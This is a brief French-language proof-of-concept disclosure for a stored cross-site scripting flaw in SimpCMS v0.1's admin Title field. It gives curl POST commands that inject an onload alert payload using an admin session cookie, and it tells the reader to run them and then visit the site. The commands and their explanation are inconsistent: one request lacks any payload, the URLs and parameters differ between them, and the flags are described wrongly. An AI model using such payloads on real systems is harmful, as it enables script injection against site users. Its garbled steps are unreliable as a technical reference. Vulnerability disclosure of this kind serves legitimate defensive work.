
Publication pour Cross Site Scripting (XSS) dans SimpCMS v0.1 - /SimpCMS/admin.php
Une vulnérabilité de script intersite (XSS) dans SimpCMS v0.1 permet aux attaquants d'exécuter des scripts web ou du HTML arbitraires via une charge utile spécialement conçue injectée dans le champ Titre à /admin.php.
Après vous être connecté à l'interface d'administration de SimpCMS, copiez les valeurs de Cookie correspondantes observées dans l'onglet Application de l'élément Inspect du navigateur et soumettez la requête curl suivante :
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


Les paramètres initiaux observés pour le logiciel SimpCMS ont abouti à la commande cURL suivante, mais celle-ci a ensuite été mise à jour :
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explication :
- curl : l'outil en ligne de commande pour transférer des données avec des URL.
- -X POST : spécifie la méthode de requête à utiliser (POST).
- "http://site.com/SimpCMS/admin.php" : l'URL à laquelle la requête est envoyée.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - la charge utile de la requête POST.
Exécutez cette commande dans votre terminal pour envoyer la requête POST avec la charge utile XSS. Visitez le site principal /SimpCMS et le XSS sera visible.